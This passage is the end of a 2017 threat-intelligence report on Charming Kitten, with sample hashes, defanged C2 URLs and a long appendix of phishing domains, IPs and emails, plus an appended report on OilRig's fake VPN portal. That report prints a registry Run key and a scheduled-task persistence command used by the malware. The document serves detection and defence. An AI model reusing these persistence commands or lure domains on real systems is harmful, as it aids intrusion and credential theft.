key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Window Update
data: C:\Users\user1\AppData\Local\Microsoft\Windows\wuauclt.exe
10 unique chocolates in the world.exe
be207941ce8a5e212be8dde83d05d38d
3b4926014b9cc028d5fb9d47fee3dbd9376525dcb3b6e2173c5edb22494cfa9b
sami.exe
3261d45051542ab3e54fa541f132f899
479e1e02d379ad6c3c7f496d705448fa955b50a1
C:\Users\user1\AppData\Local\Temp\IXP000.TMP\sami.exe
C:\Users\user1\AppData\Local\Microsoft\Windows\wuauclt.exe
20f2da7b0c482ab6a78e9bd65a1a3a92
http://msoffice-update[.]com/gallery/help.php
d:\Task\D\Task\FUD\DownPaper\trunk\Downloader\obj\Debug\wuauclt.pdb
ax haye ayin.exe
276befa70cff36860cd97e3e19f10343
753b73b82ec8307f54cfb80091600fb283476aa6df7102d6af82048ef4a5913f
5.79.69[.]206:4455
pita.exe
60753796905458fa6a4407f48309aa25
53f7b95262971d79e676055d239180d653fd838dc6ffb9a3418ccad2b66c54bc
C:\Users\user1\AppData\Local\Temp\IXP000.TMP\pita.exe
aziii.exe
3c01793380fbd3f101603af68e96f058
13ac10cd2595fb8fefd4e15c1b82bd2c8e1953809f0d1c349641997aeb9f935c
Azita Gallery.exe
30124b5c56cecf2045abd24011bdf06b
9aa7fc0835e75cbf7aadde824c484d7dc53fdc308a706c9645878bbd6f5d3ad8
Page 49 of 59
All rights reserved to ClearSky Cyber Security, 2017
MAGICHOUND.RETRIEVER
By pivoting off the malicious infrastructure we found a sample of MAGICHOUND.RETRIEVER, a malware
which is covered in a report by Palo Alto Networks about a group they call Magic Hound37. The report says
that Magic Hound
has primarily targeted organizations in the energy, government, and technology sectors
that are either based or have business interests in Saudi Arabia
. Also,
Link analysis of infrastructure and
tools [
] revealed a potential relationship between Magic Hound and the adversary group called
Rocket
Kitten
. The last notion is in line with our findings.
MAGICHOUND.RETRIEVER is a .NET downloader that retrieves secondary payloads using an embedded URL
in its configuration as the C2. Below is the sample that we found.
flashplayer.exe
9d0e761f3803889dc83c180901dc7b22
ecf9b7283fda023fa37ad7fdb15be4eadded4e06
d4375a22c0f3fb36ab788c0a9d6e0479bd19f48349f6e192b10d83047a74c9d7
http://update-microsoft[.]bid/img/WebService.asmx
http://update-driversonline[.]bid/img/WebService.asmx
The connections between the sample and Charming Kitten
s infrastructure is depicted in the graph below:
https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/
Page 50 of 59
All rights reserved to ClearSky Cyber Security, 2017
Appendix A - Indicators of Compromise
012mail-net-uwclogin[.]ml
443[.]tcp[.]shorturlbot[.]club
874511478[.]account-login[.]net
8ghefkwdvbfdsg3asdf1[.]com
account-customerservice[.]com
account-dropbox[.]net
account-google[.]co
account-login[.]net
account-logins[.]com
account-log-user-verify-mail[.]com
account-permission-mail-user[.]com
accounts[.]account-google[.]co
accounts[.]activities[.]devices[.]com[.]accounts[.]a
ctivities[.]devices[.]com[.]usersettings[.]cf
accounts[.]activities[.]devices[.]com[.]accounts[.]g
oogle[.]com[.]usersettings[.]cf
accounts[.]activities[.]devices[.]com[.]drive[.]goog
le[.]com[.]usersettings[.]cf
accounts[.]activities[.]devices[.]com[.]usersettings
[.]cf
accounts[.]google[.]com[.]accounts[.]activities[.]d
evices[.]com[.]usersettings[.]cf
accounts[.]google[.]com[.]accounts[.]google[.]com
[.]usersettings[.]cf
accounts[.]google[.]com[.]drive[.]google[.]com[.]u
sersettings[.]cf
accounts[.]google[.]com[.]usersettings[.]cf
accountservice[.]support
account-servicerecovery[.]com
accounts-googelmail[.]com
accounts-googelmails[.]com
account-signin-myaccount-users[.]ga
accounts-logins[.]net
accountsrecovery[.]ddns[.]net
accounts-service[.]support
accountsservice-support[.]com
account-support-user[.]com
accounts-yahoo[.]us
accountts-google[.]com
account-user[.]com
account-user-permission-account[.]com
account-users-mail[.]com
account-user-verify-mail[.]com
acounts-qooqie-con[.]ml
addons-mozilla[.]download
ae[.]ae[.]asus-support[.]net
ae[.]asus-support[.]net
ae[.]bocaiwang[.]asus-support[.]net
ae[.]client[.]asus-support[.]net
aipak[.]org
aiqac[.]org
aol-mail-account[.]com
apache-utility[.]com
api[.]com-service[.]net
app-documents[.]com
app-facebook[.]co
appleid[.]apple[.]com[.]account-logins[.]com
araamco[.]com
araamco[.]com
archive-center[.]com
asus-support[.]net
asus-update[.]com
berozkhodro[.]com
blog[.]group-google[.]com
bocaiwang[.]ae[.]asus-support[.]net
bocaiwang[.]asus-support[.]net
bocaiwang[.]bocaiwang[.]asus-support[.]net
bocaiwang[.]client[.]asus-support[.]net
book-archivecenter[.]bid
books-archivecenter[.]bid
books-archivecenter[.]club
books-google[.]accountservice[.]support
books-google[.]books-archivecenter[.]bid
books-google[.]www[.]books-archivecenter[.]bid
books-view[.]com
bootstrap[.]serveftp[.]com
britishnews[.]com[.]co
britishnews[.]org
broadcastbritishnews[.]com
brookings-edu[.]in
change-mail-accounting-register-single[.]com
change-mail-account-nodes-permision[.]com
change-permission-mail-user-managment[.]com
change-user-account-mail-permission[.]com
client[.]ae[.]asus-support[.]net
client[.]asus-support[.]net
client[.]bocaiwang[.]asus-support[.]net
client[.]client[.]asus-support[.]net
codeconfirm-recovery[.]bid
codeconfirm-recovery[.]club
com-account-login[.]com
com-accountrecovery[.]bid
com-accountsecure-recovery[.]name
com-accountsrecovery[.]name
com-archivecenter[.]work
com-customeradduser[.]bid
com-customerservice[.]bid
com-customerservice[.]name
com-customerservices[.]name
com-customersuperuser[.]bid
Page 51 of 59
All rights reserved to ClearSky Cyber Security, 2017
com-download[.]ml
com-manage-accountuser[.]club
com-messagecenter[.]bid
com-messengerservice[.]bid
com-messengerservice[.]work
com-microsoftonline[.]club
com-mychannel[.]bid
com-orginal-links[.]ga
com-recoversessions[.]bid
com-recovery[.]com
com-recoveryadduser[.]bid
com-recoveryidentifier[.]bid
com-recoveryidentifier[.]name
com-recoveryidentifiers[.]bid
com-recoverymail[.]bid
com-recoverysecureuser[.]club
com-recoverysecureusers[.]club
com-recoveryservice[.]bid
com-recoveryservice[.]info
com-recoverysessions[.]bid
com-recoverysubusers[.]bid
com-recoverysuperuser[.]bid
com-recoverysuperuser[.]club
com-recoverysuperuser[.]name
com-recoverysuperusers[.]bid
com-recoverysupport[.]bid
com-recoverysupport[.]club
com-service[.]net
com-servicecustomer[.]bid
com-servicecustomer[.]name
com-servicemail[.]bid
com-servicerecovery[.]bid
com-servicerecovery[.]club
com-servicerecovery[.]info
com-servicerecovery[.]name
com-servicescustomer[.]name
com-serviceslogin[.]com
com-showvideo[.]gq
com-statistics[.]com
com-stats[.]com
com-video[.]net
com-videoservice[.]work
com-viewchannel[.]club
confirm-code[.]account-support-user[.]com
crcperss[.]com
cvcreate[.]org
digitalqlobe[.]com
display-error-runtime[.]com
display-ganavaro-abrashimchi[.]com
docs-google[.]co
documents[.]sytes[.]net
documents-supportsharing[.]bid
documents-supportsharing[.]club
document-supportsharing[.]bid
doc-viewer[.]com
download[.]account-login[.]net
download-google[.]com-orginal-links[.]ga
download-google[.]orginal-links[.]com
download-link[.]top
drive[.]change-mail-account-nodespermision[.]com
drive[.]google[.]com[.]accounts[.]activities[.]devic
es[.]com[.]usersettings[.]cf
drive[.]google[.]com[.]accounts[.]google[.]com[.]u
sersettings[.]cf
drive[.]google[.]com[.]drive[.]google[.]com[.]users
ettings[.]cf
drive[.]google[.]com[.]usersettings[.]cf
drive[.]privacy-yahoomail[.]com
drive-download[.]account-support-user[.]com
drive-download[.]account-user-permissionaccount[.]com
drive-file[.]account-support-user[.]com
drive-google[.]co
drive-login[.]cf
drive-mail[.]account-support-user[.]com
drive-permission-user-account[.]com
drivers[.]document-supportsharing[.]bid
drives-google[.]co
drives-google[.]com
drives-google[.]com[.]co
drive-useraccount-signin-mail[.]ga
dropbox[.]com-servicecustomer[.]name
dropbox[.]com-servicescustomer[.]name
drop-box[.]vip
dropebox[.]co
embraer[.]co
emiartas[.]com
error-exchange[.]com
eursaia[.]org
facebook[.]com-service[.]gq
facebook[.]notification-accountrecovery[.]com
fanderfart22[.]xyz
fardenfart2017[.]xyz
fb[.]com-download[.]ml
fb-login[.]cf
ftp[.]account-logins[.]com
ftp[.]account-permission-mail-user[.]com
ftp[.]accountservice[.]support
ftp[.]accountsservice-support[.]com
ftp[.]archive-center[.]com
ftp[.]britishnews[.]com[.]co
ftp[.]com-recoveryservice[.]info
ftp[.]com-service[.]net
ftp[.]goo-gle[.]cloud
ftp[.]goo-gle[.]mobi
Page 52 of 59
All rights reserved to ClearSky Cyber Security, 2017
ftp[.]microsoft-upgrade[.]mobi
ftp[.]news-onlines[.]info
ftp[.]officialswebsites[.]info
ftp[.]orginal-links[.]com
ftp[.]screen-royall-in-corporate[.]com
ftp[.]screen-shotuser-trash-green[.]com
ftp[.]sdfsd[.]screen-royall-in-corporate[.]com
ftp[.]service-broadcast[.]com
ftp[.]service-recoveryaccount[.]com
ftp[.]set-ymail-user-account-permissionchallenge[.]com
ftp[.]support-aasaam[.]com
ftp[.]support-recoverycustomers[.]com
ftp[.]uk-service[.]org
ftp[.]verify-account[.]services
ftp[.]w3schools-html[.]com
ftp[.]www[.]britishnews[.]com[.]co
ftp[.]www[.]screen-shotuser-trash-green[.]com
gle-mail[.]com
gmail[.]com-recoverymail[.]bid
gmail[.]com-u6[.]userlogin[.]securitylogin[.]activity[.]com-verification-accounts[.]com
gmail-recovery[.]ml
gmal[.]cf
goog-le[.]bid
goo-gle[.]bid
goo-gle[.]cloud
google[.]mail[.]com-servicecustomer[.]bid
google[.]mail[.]mail[.]google[.]comservicecustomer[.]bid
google[.]mail[.]www[.]com-servicecustomer[.]bid
goo-gle[.]mobi
google-drive[.]account-servicerecovery[.]com
google-drive[.]accounts-service[.]support
google-drive[.]account-support-user[.]com
google-drive[.]com[.]accountservice[.]support
google-drive[.]service-recoveryaccount[.]com
google-hangout[.]accountservice[.]support
google-hangout[.]accounts-service[.]support
google-hangout[.]account-support-user[.]com
google-hangout[.]verify-account[.]services
google-mail[.]com[.]co
googlemail[.]com-customersuperuser[.]bid
google-mail-recovery[.]com
googlemails[.]co
google-profile[.]com
google-profiles[.]com
google-setting[.]com
google-verification[.]com
google-verify[.]com
google-verify[.]net
hangout[.]com-messagecenter[.]bid
hangout[.]messageservice[.]club
help-recovery[.]com
hot-mail[.]ml
hqr-mail[.]nioc-intl[.]account-user-permissionaccount[.]com
id-bayan[.]com
iforget-memail-user-account[.]com
iranianuknews[.]com
ir-owa-accountservice[.]bid
itunes-id-account[.]users-login[.]com
k2intelliqence[.]com
k2intelliqence[.]com
komputertipstrik[.]com-customeradduser[.]bid
line-en[.]me
log[.]account[.]accountservice[.]support
login[.]com-service[.]net
login[.]radio-m[.]cf
login-account[.]net
login-account-google[.]orginal-links[.]com
login-account-mail[.]com
login-again[.]ml
login-mail[.]account-servicerecovery[.]com
login-mail[.]verify-account[.]services
login-mails[.]account-servicerecovery[.]com
login-mails[.]accounts-service[.]support
login-mails[.]account-support-user[.]com
login-mails[.]verify-account[.]services
login-required[.]ga
login-required[.]ml
login-required[.]tk
logins-mails[.]account-customerservice[.]com
logins-mails[.]account-servicerecovery[.]com
logins-mails[.]accounts-service[.]support
logins-mails[.]accountsservice-support[.]com
logins-mails[.]com-servicecustomer[.]name
logins-mails[.]service-recoveryaccount[.]com
login-webmail[.]accounts-service[.]support
login-webmail[.]account-support-user[.]com
login-webmail[.]verify-account[.]services
logn-micrsftonine-con[.]ml
m[.]com-service[.]net
mail[.]account-google[.]co
mail[.]com-service[.]net
mail[.]google[.]com-customerservice[.]name
mail[.]google[.]com-customerservices[.]name
mail[.]google[.]com-recoveryservice[.]info
mail[.]google[.]com-servicecustomer[.]bid
mail[.]google[.]com-servicescustomer[.]name
mail[.]google[.]mail[.]google[.]comservicecustomer[.]bid
mail[.]google[.]www[.]com-servicecustomer[.]bid
mail[.]google[.]www[.]dropbox[.]comservicescustomer[.]name
mail[.]group-google[.]com
Page 53 of 59
All rights reserved to ClearSky Cyber Security, 2017
mail[.]mehrnews[.]info
mail[.]orginal-links[.]com
mail[.]yahoo[.]com-servicecustomer[.]name
mail[.]youtube-com[.]watch
mail3[.]google[.]com-servicecustomer[.]name
mail-account-register-recovery[.]com
mailgate[.]youtube-com[.]watch
mailgoogle[.]com-recoveryidentifier[.]bid
mailgoogle[.]com-recoverymail[.]bid
mailgoogle[.]com-recoveryservice[.]bid
mailgoogle[.]com-recoverysuperuser[.]bid
mailgoogle[.]com-recoverysupport[.]bid
mail-google[.]com-servicecustomer[.]name
mailgoogle[.]com-servicerecovery[.]bid
mail-inbox[.]account-support-user[.]com
mail-login[.]account-login[.]net
mail-login[.]accountservice[.]support
mail-login[.]account-servicerecovery[.]com
mail-login[.]service-recoveryaccount[.]com
mail-login[.]verify-account[.]services
mail-macroadvisorypartners[.]ml
mails[.]com-servicerecovery[.]name
mails-account-signin-users-permssion[.]com
mailscustomer[.]recovery-emailcustomer[.]com
mailssender[.]bid
mail-user-permission-sharedaccount[.]com
mail-usr[.]account-support-user[.]com
mail-verify[.]account-support-user[.]com
mail-yahoo[.]com[.]co
market-account-login[.]net
me[.]youtube[.]com-mychannel[.]bid
mehrnews[.]info
messageservice[.]bid
messageservice[.]club
mfacebook[.]login-required[.]ga
microsoft-hotfix[.]com
microsoft-update[.]bid
microsoft-upgrade[.]mobi
microsoft-utility[.]com
msoffice-update[.]com
mx1[.]group-google[.]com
my[.]youtube[.]com-mychannel[.]bid
myaccount-login[.]net
mychannel[.]ddns[.]net
mychannel[.]ddns[.]net
mydrives[.]documents-supportsharing[.]bid
myemails[.]com-recoverysuperuser[.]name
my-healthequity[.]com
mymail[.]com-recoveryidentifiers[.]bid
mymail[.]com-recoverysuperuser[.]name
my-mailcoil[.]ml
mymails[.]com-recoverysuperuser[.]bid
mymails[.]com-recoverysuperuser[.]name
myscreenname[.]bid
news-onlines[.]info
nex1music[.]ml
notification-accountrecovery[.]com
ns1[.]check-yahoo[.]com
ns1[.]com-service[.]net
ns2[.]check-yahoo[.]com
nvidia-support[.]com
nvidia-update[.]com
officialswebsites[.]info
official-uploads[.]com
ogin-mails[.]accounts-service[.]support
onedrive-signin[.]com
onlinedocument[.]bid
onlinedocuments[.]org
onlinedrie-account-permission-verify[.]com
onlineserver[.]myftp[.]biz
online-supportaccount[.]com
orginal-links[.]com
outlook-livecom[.]bid
owa-insss-org-ill-owa-authen[.]ml
paypal[.]com[.]webapp[.]logins-mails[.]servicerecoveryaccount[.]com
paypal[.]com[.]webapp[.]paypal[.]com[.]webapp[.
]service-recoveryaccount[.]com
paypal[.]com[.]webapp[.]servicerecoveryaccount[.]com
picofile[.]xyz
policy-facebook[.]com
pop[.]group-google[.]com
privacy-facebook[.]com
privacy-gmail[.]com
privacy-yahoomail[.]com
profile[.]facebook[.]accountservice[.]support
profile[.]facebook[.]notificationaccountrecovery[.]com
profile-facebook[.]co
profiles-facebook[.]com
profile-verification[.]com
qet-adobe[.]com
radio-m[.]cf
raykiel[.]net
recoverycodeconfirm[.]bid
recovery-customerservice[.]com
recovery-emailcustomer[.]com
recoverysuperuser[.]bid
register-multiplay[.]ml
reset-login[.]accountservice[.]support
reset-login[.]account-support-user[.]com
reset-login-yahoo-com[.]account-supportuser[.]com
reset-mail[.]account-support-user[.]com
Page 54 of 59
All rights reserved to ClearSky Cyber Security, 2017
reset-mail-yahoo-com[.]account-supportuser[.]com
resets-mails[.]account-support-user[.]com
result2[.]com-servicescustomer[.]name
result2[.]www[.]dropbox[.]comservicescustomer[.]name
sadashboard[.]com
saudiarabiadigitaldashboards[.]com
saudi-government[.]com
saudi-haj[.]com
screen-royall-in-corporate[.]com
screen-shotuser-trash-green[.]com
sdfsd[.]screen-royall-in-corporate[.]com
sdfsd[.]screen-shotuser-trash-green[.]com
security-supportteams-mail-change[.]ga
service-accountrecovery[.]com
service-broadcast[.]com
servicecustomer[.]bid
servicelogin-mail[.]account-servicerecovery[.]com
service-logins[.]net
servicemailbroadcast[.]bid
service-recoveryaccount[.]com
set-ymail-user-account-permissionchallenge[.]com
shared-access[.]com
shared-login[.]com
shared-permission[.]com
shop[.]account-dropbox[.]net
shorturlbot[.]club
show[.]video-youtube[.]cf
show-video[.]info
slmkhubi[.]ddns[.]net
smstagram[.]com
smtp[.]com-service[.]net
smtp[.]group-google[.]com
smtp[.]youtube-com[.]watch
sports[.]accountservice[.]support
sprinqer[.]com
support[.]account-google[.]co
support-aasaam[.]bid
support-aasaam[.]com
support-accountsrecovery[.]com
support-google[.]co
support-recoverycustomers[.]com
supports-recoverycustomers[.]com
support-verify-account-user[.]com
tadawul[.]com[.]co
tai-tr[.]com
tcp[.]shorturlbot[.]club
team-speak[.]cf
team-speak[.]ga
team-speak[.]ml
teamspeak-download[.]ml
teamspeaks[.]cf
telagram[.]cf
test[.]service-recoveryaccount[.]com
token-ep[.]com
uk-service[.]org
update-checker[.]net
update-driversonline[.]bid
update-driversonline[.]club
update-finder[.]com
update-microsoft[.]bid
updater-driversonline[.]club
update-system-driversonline[.]bid
uploader[.]sytes[.]net
upload-services[.]com
uri[.]cab
us[.]battle[.]net[.]cataclysm[.]accountlogins[.]com
usersettings[.]cf
users-facebook[.]com
users-login[.]com
users-yahoomail[.]com
utc[.]officialswebsites[.]info
utopaisystems[.]net
verify-account[.]services
verify-accounts[.]info
verify-facebook[.]com
verify-gmail[.]tk
verify-your-account-information[.]userslogin[.]com
video[.]yahoo[.]com[.]accountservice[.]support
video[.]yahoo[.]com-showvideo[.]gq
video[.]youtube[.]com-showvideo[.]ga
video-mail[.]account-support-user[.]com
video-yahoo[.]accountservice[.]support
video-yahoo[.]account-support-user[.]com
video-yahoo[.]com[.]accountservice[.]support
video-youtube[.]cf
w3sch00ls[.]hopto[.]org
w3school[.]hopto[.]org
w3schools[.]hopto[.]org
w3schools-html[.]com
watch-youtube[.]org[.]uk
webmaiil-tau-ac-il[.]ml
webmail-login[.]accountservice[.]support
webmail-tidhar-co-il[.]ml
wildcarddns[.]com-service[.]net
windows-update[.]systems
wp[.]com-microsoftonline[.]club
ww2[.]group-google[.]com
ww62[.]group-google[.]com
ww62[.]mx1[.]group-google[.]com
ww92[.]group-google[.]com
xn--googe-q2e[.]ml
Page 55 of 59
All rights reserved to ClearSky Cyber Security, 2017
yahoo[.]com[.]accountservice[.]support
yahoo-proflles[.]com
yahoo-verification[.]net
yahoo-verification[.]org
yahoo-verify[.]net
youetube[.]ga
yourl[.]bid
youttube[.]ga
youttube[.]gq
youtubbe[.]cf
youtubbe[.]ml
youtube[.]com[.]login-account[.]net
youtube[.]com-service[.]gq
youtube-com[.]watch
youtubee-videos[.]com
youtubes[.]accounts[.]com-serviceslogin[.]com
youtuebe[.]co
youtuobe[.]com[.]co
youutube[.]cf
yurl[.]bid
admin@doc-viewer.com
admin@dropebox.co
admin@screen-royall-in-corporate.com
admin@screen-shotuser-trash-green.com
anita.jepherson@gmail.com
aryaieiran@gmail.com
aryaieiran@gmail.com
bahra.azadeh88@gmail.com
cave.detector@yandex.com
cave.detector@yandex.com
center2016@yandex.com
chada.martini@yandex.com
chada.martini@yandex.com
cool.hiram@yandex.com
customers.mailservice@gmail.com
customers.noreplyservice@gmail.com
international.research@mail.com
isabella.careyy@gmail.com
isabella.careyy@gmail.com
john.lennon@uymail.com
jully.martin@yandex.com
jully.martin@yandex.com
mails.customerservices@gmail.com
martin.switch911@gmail.com
martin.switch911@gmail.com
message.intercom@gmail.com
message.intercom@gmail.com
nami.rosoki@gmail.com
online.nic@yandex.com
online.nic@yandex.com
rich.safe@yandex.com
rskitman@gmail.com
sali.rash@yandex.com
sali.rash@yandex.com
service.center2016@yandex.com
service.center2016@yandex.com
suspended.user.noitification@gmail.com
yaffa.hyatt9617@gmail.com
107.150.38.19
107.150.60.156
107.150.60.158
107.6.179.131
136.243.108.100
136.243.221.148
136.243.226.189
137.74.131.208
137.74.148.218
144.76.97.61
144.76.97.62
145.239.120.88
149.56.135.42
149.56.201.205
158.255.1.34
164.132.251.217
164.132.29.69
173.208.129.180
173.244.180.131
173.244.180.132
173.244.180.133
173.244.180.134
173.45.108.55
173.90.180.125
178.33.38.128
185.117.74.165
185.141.24.64
185.141.24.66
185.82.202.174
192.99.127.216
194.88.107.63
204.12.207.108
204.12.207.110
204.12.242.84
204.12.242.85
207.244.77.15
207.244.79.143
207.244.79.144
207.244.79.147
207.244.79.148
208.110.73.219
208.110.73.220
208.110.73.221
208.110.73.222
209.190.3.113
209.190.3.114
209.190.3.115
209.190.3.41
Page 56 of 59
All rights reserved to ClearSky Cyber Security, 2017
209.190.3.42
209.190.3.43
213.152.173.198
213.32.11.30
213.32.49.232
217.23.3.158
217.23.5.166
31.3.236.90
31.3.236.91
31.3.236.92
37.220.8.13
46.17.97.240
46.17.97.243
46.17.97.37
46.17.97.40
5.152.202.51
5.152.202.52
5.79.105.153
5.79.105.156
5.79.105.161
5.79.105.165
5.79.69.198
51.254.254.217
51.255.28.57
54.36.217.8
69.30.221.126
69.30.224.244
69.30.224.245
81.171.25.229
81.171.25.232
85.17.172.170
86.105.1.111
91.218.245.251
92.222.206.208
93.158.200.170
93.158.215.50
93.158.215.52
94.23.90.226
00b5d45433391146ce98cd70a91bef08
07fb3f925f8ef2c53451b37bdd070b55
0a3f454f94ef0f723ac6a4ad3f5bdf01
0e3cb289f65ef5faf40fa830ac9b1bf6
1c00fd5e1ddd0226bd854775180fd361
1db12ec1f335ee5995b29dea360514a2
20f2da7b0c482ab6a78e9bd65a1a3a92
253b4f5c6611a4bc9c7f5269b127c8e9
3261d45051542ab3e54fa541f132f899
356439bfb9b2f49858897a22dd85df86
365482f10808ddd1d26f3dc19c41c993
3bb2f304a59255dddc5ef6bb0a32aec7
3edec580845d7ab85fa893afb391fbfb
5e9a458dcdfc9d2ce996081ec87c30e0
5ec9f484603b89f80f351bb88279ebb1
6bd505616e12e3dd7f2287f24f34609f
6cfa579dd1d33c2fa42d85c2472f744c
7df3a83dfcce130c01aabede3cfe8140
7e1cf48d84e503499c9718c50e7a1c52
9c7ae44baf8df000bb614738370d1171
9d0e761f3803889dc83c180901dc7b22
a43b7cc495741248f3647e647f776467
a9117da1cb51adbc88a52a6e3b16a6c4
ae797446710e375f0fc9a33432d64256
af5c01a7a3858bc3712ab69bc673cec4
bd0a6fe7a852fdd61c1da37cf99103d2
be207941ce8a5e212be8dde83d05d38d
bfd21f2847c1d7aa0f409ef52ed52e05
c7760dc8f7baf67f80ab549af27df9e9
c96453247ee1ecbd4053da8bbb4cf572
ccaf21e122ca9d2e2397a9e28eb4cc87
d6ea39e1d4aaa8c977a835e72d0975e3
d6fa439f0278babb1edff32d8dc31c59
da1f6a5f2a5564c2131b4a311c55f487
e7dd9b8fe7ae14faad304d139f71b629
e93992f26f224ea53d9bdd9564e8e1c0
edd4011696ddd349575278aed7031a47
f5763b8b796b1c5d04febcc65f853967
f7f9806af42adb80d100e55f35cfa86c
f9255e0d492eb20df1e78ccc970b121a
fac158623b0e3ed3bea6e24b1795cb95
479e1e02d379ad6c3c7f496d705448fa955b50a1
67bb83bbe82ffa910386216619c5ebf9eecf13e6
6cacf83033fa97f4ac27eb27e4aa265afa4dc51d
a2f17906ca39e7f41a8adeea4be5ffb7d1465c4a
c5ea8680162d3e8bc3d71c060c15bf224c873f7a
d97b13ed0fe3e41b60b9d45b6e7f68c9b6187b96
eac4a47f238ee62661f464a807b3e0b5079b835f
ecf9b7283fda023fa37ad7fdb15be4eadded4e06
19c0977fdbc221f7d6567fb268a4ef4cd2a759fcbc1
039a82366978089f080d2
1a24714fd99030bd63804ab96fc2612f148a5f08d1
c2845152c3a0e168600db9
261c5f32abb8801576ce81be2c66bca564a8a28ab
5ea0954bad6bac7071e299b
2c92da2721466bfbdaff7fedd9f3e8334b688a88ee
54d7cab491e1a9df41258f
2db1e2c49ff0792b54d84538c9a420de7aa619602
b66add502e2b6ea7c79fd4b
4fff9cd7f5f4c9048cfaf958a54cc4c4bc14c9fdbfd63
e2c17f79913f0ea8c21
6618051ea0c45d667c9d9594d676bc1f4adadd8cb
30e0138489fee05ce91a9cb
8aff94ceb2fed8ba864df929fbbec3dd82cbd968c5
b2f42971fb756d1ba1ecb6
a86ccf0049be20c105e2c087079f18098c739b86d5
2acb13f1d41f1ccc9f8e1c
Page 57 of 59
All rights reserved to ClearSky Cyber Security, 2017
acca9f004a596ea33af65725c2319bf845a442ee9fa
09c511d359df2f632cf4d
b0b177d06fb987429f01d937aaa1cbb7c93a69cfae
f146b60f618f8ab26fac38
d4375a22c0f3fb36ab788c0a9d6e0479bd19f48349
f6e192b10d83047a74c9d7
d7e1d13cab1bd8be1f00afbec993176cc116c2b233
209ea6bd33e6a9b1ec7a7f
d7f2b4188b7c30c1ef9c075891329dbcf8e9b5ebac
1ef8759bc3bb2cf68c586f
d84e808e7d19a86bea3862710cae1c45f7291e984
c9857d0c86881812674d4bb
e6cd39cf0af6a0b7d8129bf6400e671d5fd2a3797b
92e0fe4a8e93f3de46b716
Page 58 of 59
All rights reserved to ClearSky Cyber Security, 2017
Appendix B - Previous reports about Charming Kitten
and Rocket Kitten
Rocket Kitten:
rocket kitten: a campaign with 9 lives - Check Point Blog38
LONDON CALLING Two-Factor Authentication Phishing From Iran39
Thamar Reservoir
An Iranian cyber-attack campaign against targets in the Middle East40
Rocket Kitten Showing Its Claws: Operation Woolen-GoldFish and the GHOLE campaign41
The Kittens Strike Back: Rocket Kitten Continues Attacks on Middle East Targets42
Increased Use of Android Malware Targeting Journalists43
Iran and the Soft War for Internet Dominance44
Charming Kitten:
iKittens: Iranian Actor Resurfaces with Malware for Mac (MacDownloader)45
Fictitious Profiles and WebRTC
s Privacy Leaks Used to Identify Iranian Activists46
Freezer Paper around Free Meat47
https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf
https://citizenlab.ca/2015/08/iran_two_factor_phishing/
http://www.clearskysec.com/thamar-reservoir/
https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-woolen-goldfish-when-kittens-gophishing
https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/rocket-kitten-continues-attacks-on-middle-easttargets
https://iranthreats.github.io/resources/android-malware/
https://iranthreats.github.io/us-16-Guarnieri-Anderson-Iran-And-The-Soft-War-For-Internet-Dominance-paper.pdf
https://iranthreats.github.io/resources/macdownloader-macos-malware/
https://iranthreats.github.io/resources/webrtc-deanonymization/
https://securelist.com/freezer-paper-around-free-meat/74503/
Page 59 of 59
All rights reserved to ClearSky Cyber Security, 2017
Iranian Threat Agent OilRig Delivers Digitally Signed Malware,
Impersonates University of Oxford
clearskysec.com/oilrig/
Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East
since the end of 2015. In recent attacks they set up a fake VPN Web Portal and targeted at least five Israeli IT
vendors, several financial institutes, and the Israeli Post Office.
Later, the attackers set up two fake websites pretending to be a University of Oxford conference sign-up page and a
job application website. In these websites they hosted malware that was digitally signed with a valid, likely stolen
code signing certificate
Based on VirusTotal uploads, malicious documents content, and known victims
other targeted organisations are
located in Turkey, Qatar, Kuwait, United Arab Emirates, Saudi Arabia, and Lebanon.
Fake VPN Web Portal
In one of the recent cases, the attackers sent the following email to individuals in targeted organisations:
The email was sent from a compromised account of an IT vendor. Similar emails were sent from other IT vendors in
the same time period, suggesting the attackers had a foothold within their networks, or at least could get access to
specific computers or email accounts.
The link provided in the malicious email led to a fake VPN Web Portal:
Upon logging in with the credentials provided in the email, the victim is presented with the following page:
The victim is asked to install the
VPN Client
(an .exe file), or, if download fails, to download a password protected
zip (with the same .exe file inside).
The
VPN Client
is a legitimate Juniper VPN software bundled with Helminth, a malware in use by the OilRig
threat agnet:
JuniperSetupClientInstaller.exe
6a65d762fb548d2dc56cfde4842a4d3c (VirusTotal link)
If the victim downloads and installs the file, their computer would get infected, while the legitimate VPN software is
installed. The legitimate and the malicious installations can be seen in the process tree when the file is run in a
Cuckoo sandbox. Malicious processes are marked red (click image to enlarge):
The following malicious files are dropped and run:
C:\ProgramData\{2ED05C38-D464-4188-BC7F-F6915DE8D764}\OFFLINE\9A189DFE\C7B7C186\main.vbs
dcac79d7dc4365c6d742a49244e81fd0
C:\Users\Public\Libraries\RecordedTV\DnE.ps1
7fe0cb5edc11861bc4313a6b04aeedb2
C:\Users\Public\Libraries\RecordedTV\DnS.ps1
3920c11797ed7d489ca2a40201c66dd4
C:\Windows\System32\schtasks.exe
/create /F /sc minute /mo 3 /tn
GoogleUpdateTasksMachineUI
/tr
C:\Users\Public\Libraries\RecordedTV\backup.vbs
7528c387f853d96420cf7e20f2ad1d32
Command and control server is located in the following domain:
tecsupport[.]in
A detailed analysis of the malware is provided in two posts by Palo Alto networks and in a post by FireEye,
which wrote about previous campaigns by this threat agent.
(Note that Juniper networks was not compromised nor otherwise involved in the attack, except for the attackers
using its name and publicly available software).
Digitally signed malware
The entire bundle (VPN client and malware) was digitally signed with a valid code signing certificate issued by
Symantec to AI Squared, a legitimate software company that develops accessibility software:
Thumbprint: F340C0D841F9D99DBC289151C13391000366631C
Serial number: 45 E4 7F 56 0B 01 B6 4E 68 39 5E 5D 79 2F 2E 09
Another Helminth sample, 1c23b3f11f933d98febfd5a92eb5c715, was
signed with a different AI Squared code signing certificate:
Thumbprint: 92B8C0872BACDC226B9CE4D783D5CCAD61C6158A
Serial number:62 E0 44 E7 37 24 61 2D 79 4B 93 AF 97 46 13 48
This suggest that the attackers had got a hold of an Ai Squared signing
key, potentially after compromising their network. Alternatively, the
attackers might have got Symantec to issue them a certificate under Ai
Squared
s name.
